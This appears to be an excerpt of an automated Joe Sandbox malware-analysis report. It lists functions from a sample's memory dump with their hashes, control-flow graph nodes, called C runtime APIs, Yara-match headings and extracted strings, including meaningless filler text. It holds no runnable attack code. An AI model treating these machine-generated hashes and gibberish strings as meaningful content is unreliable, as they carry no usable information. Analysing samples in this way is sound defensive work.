                                • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                • Instruction ID: 7a6d5f2b1ac9f2516fc65378da4bcf37cd69fe5e4ba3b8ada3fee6568550e07b
                                • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                • Instruction Fuzzy Hash: ED210535124741EEE7317FE5EC01E6B7BDADF41760B508129F488554ACEB729560CF90

                                Control-flow Graph

                                APIs
                                • std::exception::exception.LIBCMT ref: 022FFC1F
                                  • Part of subcall function 022E169C: std::exception::_Copy_str.LIBCMT ref: 022E16B5
                                • __CxxThrowException@8.LIBCMT ref: 022FFC34
                                • std::exception::exception.LIBCMT ref: 022FFC4D
                                • __CxxThrowException@8.LIBCMT ref: 022FFC62
                                • std::regex_error::regex_error.LIBCPMT ref: 022FFC74
                                  • Part of subcall function 022FF914: std::exception::exception.LIBCMT ref: 022FF92E
                                • __CxxThrowException@8.LIBCMT ref: 022FFC82
                                • std::exception::exception.LIBCMT ref: 022FFC9B
                                • __CxxThrowException@8.LIBCMT ref: 022FFCB0
                                Strings
                                • leM, xrefs: 022FFCA8
                                • ruhud. Ticodiputabu rid. Hicawaguroxoli dolebeve sodubu. Vubawevilapahi kiwowac ritopaxulizaz. Bohaxudoloc rabapune. Pipujiha dacihiz wawoyivojijuki. Winorujoja pegep. Xuj fimifagomibex bilawukofiral jilohogicurujam xoxitolelupagel. Vigu getosixiti jumebivom. , xrefs: 022FFCB6
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                                • String ID: leM$ruhud. Ticodiputabu rid. Hicawaguroxoli dolebeve sodubu. Vubawevilapahi kiwowac ritopaxulizaz. Bohaxudoloc rabapune. Pipujiha dacihiz wawoyivojijuki. Winorujoja pegep. Xuj fimifagomibex bilawukofiral jilohogicurujam xoxitolelupagel. Vigu getosixiti jumebivom.
                                • API String ID: 3569886845-85255083
                                • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                • Instruction ID: eed2466e1a7610fe348633ec1b1c58820c9561a2890a93b6a3363ff0648a7724
                                • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                • Instruction Fuzzy Hash: 5811F979C0030DBBCF04EFE5D455CDDBB79AA04340B808576A92997244EB74A7588E94

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 623 22d3f16-22d3f2f 624 22d3f49-22d3f5e call 22dbdc0 623->624 625 22d3f31-22d3f3b call 22d5ba8 call 22d4c72 623->625 624->625 630 22d3f60-22d3f63 624->630 634 22d3f40 625->634 632 22d3f65 630->632 633 22d3f77-22d3f7d 630->633 635 22d3f6b-22d3f75 call 22d5ba8 632->635 636 22d3f67-22d3f69 632->636 637 22d3f7f 633->637 638 22d3f89-22d3f9a call 22e0504 call 22e01a3 633->638 639 22d3f42-22d3f48 634->639 635->634 636->633 636->635 637->635 641 22d3f81-22d3f87 637->641 647 22d4185-22d418f call 22d4c9d 638->647 648 22d3fa0-22d3fac call 22e01cd 638->648 641->635 641->638 648->647 653 22d3fb2-22d3fbe call 22e01f7 648->653 653->647 656 22d3fc4-22d3fcb 653->656 657 22d3fcd 656->657 658 22d403b-22d4046 call 22e02d9 656->658 660 22d3fcf-22d3fd5 657->660 661 22d3fd7-22d3ff3 call 22e02d9 657->661 658->639 664 22d404c-22d404f 658->664 660->658 660->661 661->639 668 22d3ff9-22d3ffc 661->668 666 22d407e-22d408b 664->666 667 22d4051-22d405a call 22e0554 664->667 670 22d408d-22d409c call 22e0f40 666->670 667->666 678 22d405c-22d407c 667->678 671 22d413e-22d4140 668->671 672 22d4002-22d400b call 22e0554 668->672 679 22d409e-22d40a6 670->679 680 22d40a9-22d40d0 call 22e0e90 call 22e0f40 670->680 671->639 672->671 681 22d4011-22d4029 call 22e02d9 672->681 678->670 679->680 689 22d40de-22d4105 call 22e0e90 call 22e0f40 680->689 690 22d40d2-22d40db 680->690 681->639 686 22d402f-22d4036 681->686 686->671 695 22d4107-22d4110 689->695 696 22d4113-22d4122 call 22e0e90 689->696 690->689 695->696 699 22d414f-22d4168 696->699 700 22d4124 696->700 703 22d413b 699->703 704 22d416a-22d4183 699->704 701 22d412a-22d4138 700->701 702 22d4126-22d4128 700->702 701->703 702->701 705 22d4145-22d4147 702->705 703->671 704->671 705->671 706 22d4149 705->706 706->699 707 22d414b-22d414d 706->707 707->671 707->699
                                APIs
                                • _memset.LIBCMT ref: 022D3F51
                                  • Part of subcall function 022D5BA8: __getptd_noexit.LIBCMT ref: 022D5BA8
                                • __gmtime64_s.LIBCMT ref: 022D3FEA
                                • __gmtime64_s.LIBCMT ref: 022D4020
                                • __gmtime64_s.LIBCMT ref: 022D403D
                                • __allrem.LIBCMT ref: 022D4093
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022D40AF
                                • __allrem.LIBCMT ref: 022D40C6
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022D40E4
                                • __allrem.LIBCMT ref: 022D40FB
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022D4119
                                • __invoke_watson.LIBCMT ref: 022D418A
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                • String ID:
                                • API String ID: 384356119-0
                                • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                • Instruction ID: 7670decd51a65d3b21f6857e9863b3e35e5918fc9bd8bbc3aae5e055ae9e3b13
                                • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                • Instruction Fuzzy Hash: 3E71E871A20717ABDB14EEF9CC40B6AB3B9BF00364F544179E514E6288EBB0DA00CF91

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                                • String ID:
                                • API String ID: 3432600739-0
                                • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                • Instruction ID: adaf01e0ffd0ad0e74ea2b8651da138febc11261f2129dfa11580b157bc9ef2d
                                • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                • Instruction Fuzzy Hash: 51412636924305AFDB10AFE4EC40BAE3BEAEF04314F10842DF91496198DBB99585DF91
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ExitProcess___crt
                                • String ID:
                                • API String ID: 1022109855-0
                                • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                • Instruction ID: 5da5bdd85a4e33a5b8bd2b6d3c2bb2d4c9ffebd4acf9b64c327bfb60d9777573
                                • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                • Instruction Fuzzy Hash: 4231D731910351DFCF215F94FC8094977A6FB14324705862AF908572B8CBB469DAEF96
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free_malloc_wprintf$_sprintf
                                • String ID:
                                • API String ID: 3721157643-0
                                • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                • Instruction ID: 6d2631539cb0f423690c2ba93930a103076ad507dc3cb87ce3453074286bcc35
                                • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                • Instruction Fuzzy Hash: 421136B69207507AC362A6F50C11FFF3BDD9F45302F0401A9FE8CD1184EA185A149BB1
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                • String ID:
                                • API String ID: 65388428-0
                                • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                • Instruction ID: 24a47d13f5b9e96dc8cdd7593f4e4f01721d9ddff13b5110e17592e92dea9728
                                • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                • Instruction Fuzzy Hash: 33515D71D40209ABEB10DBE5DC86FEFBBB9FF04704F100129F909B6184E7749A118BA5
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw$_memset_sprintf
                                • String ID:
                                • API String ID: 217217746-0
                                • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                • Instruction ID: c91d794e475c3ac0b447270288aaa80723797601b3283b5339b37b16fb329769
                                • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                • Instruction Fuzzy Hash: E051AFB1D50249AAEF11DFE1DD46FEEBB79EF04704F100129F906B6180D7B4AA058BA4
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw$_memset_sprintf
                                • String ID:
                                • API String ID: 217217746-0
                                • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                • Instruction ID: d300c429d5bf67838efb3d9804458e5fec9304ebd4ac7ba7d8f804a0f77e27ee
                                • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                • Instruction Fuzzy Hash: 64516F71D50209AADF21DFE1DD45FEFBBB9EF08744F100129F906B6184E774AA058BA4
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                                • String ID:
                                • API String ID: 3534693527-0
                                • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                • Instruction ID: 905f8ff135d9ad504c573b2d3410172a1096121125f36b86b1a7de1a4de08825
                                • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                • Instruction Fuzzy Hash: 0C310832930722EBDB616BE48C00B6FB7559F16B24F104639EF04EB29CDBB48441CAA1
                                APIs
                                • __getptd_noexit.LIBCMT ref: 023766DD
                                  • Part of subcall function 022D59BF: __calloc_crt.LIBCMT ref: 022D59E2
                                  • Part of subcall function 022D59BF: __initptd.LIBCMT ref: 022D5A04
                                • __calloc_crt.LIBCMT ref: 02376700
                                • __get_sys_err_msg.LIBCMT ref: 0237671E
                                • __invoke_watson.LIBCMT ref: 0237673B
                                • __get_sys_err_msg.LIBCMT ref: 0237676D
                                • __invoke_watson.LIBCMT ref: 0237678B
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                • String ID:
                                • API String ID: 4066021419-0
                                • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                • Instruction ID: 3657e60a276ffd2d0a6cc5f3d8245db140248320f47a7ba1ffa2615f971c4bcc
                                • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                • Instruction Fuzzy Hash: 4911C431600B546BEF357EA5DC52BAA738DDF407A1F400426FE08A6641E779D9008EE5
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: D
                                • API String ID: 2102423945-2746444292
                                • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                • Instruction ID: c7fa6a3944b4a51f0688b6cea6709d582dff2006d65cc6cd23b29b0141eeedac
                                • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                • Instruction Fuzzy Hash: 56E15C71D5021AEACF24DFE0CD89FEEB7B8BF04304F244269E909A6194EB746A45CF54
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: $$$(
                                • API String ID: 2102423945-3551151888
                                • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                • Instruction ID: 80152f30f90774ecd77d6b46a25011c4876d0f2039351cae78da7c950c38e80d
                                • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                • Instruction Fuzzy Hash: 5391BD71C10219DAEF21CFE0CC59BEEBBB5AF05308F244169D405B7285DBB65A48CFA5
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _wcsnlen
                                • String ID: U
                                • API String ID: 3628947076-3372436214
                                • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                • Instruction ID: 45ffcd47e9fce358d92e336efb546b002dbc48e273a307450faa3655bfced60a
                                • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                • Instruction Fuzzy Hash: 92212B326343097EEB009AE4AC45FBE739DDB45351FD04165F909CA198FFB1E9508AA4
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: p2Q
                                • API String ID: 2102423945-1521255505
                                • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                • Instruction ID: b9cb4589e0ad44cfb257fee4b8b24b2fe59605f2e22bfe6533a0a55f42c5ab2a
                                • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                • Instruction Fuzzy Hash: 95F0ED78698750A5F7217790BC36B857E917B35B09F104088E1182E2E5D3FD238CA79A
                                APIs
                                • std::exception::exception.LIBCMT ref: 022FFBF1
                                  • Part of subcall function 022E169C: std::exception::_Copy_str.LIBCMT ref: 022E16B5
                                • __CxxThrowException@8.LIBCMT ref: 022FFC06
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                                • String ID: TeM$TeM
                                • API String ID: 3662862379-3870166017
                                • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                • Instruction ID: 8ae3aa43f038b08b4c55130c4ab13d4985312fd4cdd90a7c0550fd1b91acc00a
                                • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                • Instruction Fuzzy Hash: 35D017B4C0030CBBCF00EFA4D449CCDBBB8AA00304B808062A91997244EA74A7498F84
                                APIs
                                  • Part of subcall function 022D197D: __wfsopen.LIBCMT ref: 022D1988
                                • _fgetws.LIBCMT ref: 022BD15C
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __wfsopen_fgetws
                                • String ID:
                                • API String ID: 853134316-0
                                • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                • Instruction ID: ca48d418fcf803e1ebe29a90f44ef240b0048920811dd43c0d196d9a4fdf8395
                                • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                • Instruction Fuzzy Hash: 5E91D171D2031A9BCF22DFE4CC847EEB7B5AF04344F140529E819A7245E7B5AA14CFA5
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _malloc$__except_handler4_fprintf
                                • String ID:
                                • API String ID: 1783060780-0
                                • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                • Instruction ID: d9e36899dd4ed1d3c0a9cca99e507170bf90b69883d9b61e54c104fa2a4f9561
                                • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                • Instruction Fuzzy Hash: 42A190B0C10248EBEF12EFE4CC59BDEBB76AF14304F144128E50576295D7B65A48CFA6
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                • String ID:
                                • API String ID: 2974526305-0
                                • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                • Instruction ID: 4da07bb039b34ec3142a3594f2dbb177d90f4b75b8c0ae503aa476b392c8503c
                                • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                • Instruction Fuzzy Hash: 57519270A20306DBDB258FF9898076EB7B5BF41324F248729FC35962DAD7B19951CB40
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                • String ID:
                                • API String ID: 3016257755-0
                                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                • Instruction ID: c49569965ca301bc45d2af39a1acc827d37559e57a4b37d360181004b7b7fbf4
                                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                • Instruction Fuzzy Hash: 6201363646024EFBCF525EC4DC01CEE7F62BB19354B888425FA5958828D376C5B2AB81
                                APIs
                                • ___BuildCatchObject.LIBCMT ref: 02377A4B
                                  • Part of subcall function 02378140: ___BuildCatchObjectHelper.LIBCMT ref: 02378172
                                  • Part of subcall function 02378140: ___AdjustPointer.LIBCMT ref: 02378189
                                • _UnwindNestedFrames.LIBCMT ref: 02377A62
                                • ___FrameUnwindToState.LIBCMT ref: 02377A74
                                • CallCatchBlock.LIBCMT ref: 02377A98
                                Memory Dump Source
                                • Source File: 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_22b0000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                • String ID:
                                • API String ID: 2901542994-0
                                • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                • Instruction ID: b2314219a2964ee8ff989eba0ad0a8d04a68f4796823df0d29991a3608128284
                                • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                • Instruction Fuzzy Hash: 0601D732100109BBDF22AF55CC05EEA7BBAEF48754F158015F91865221D73AE961EFA0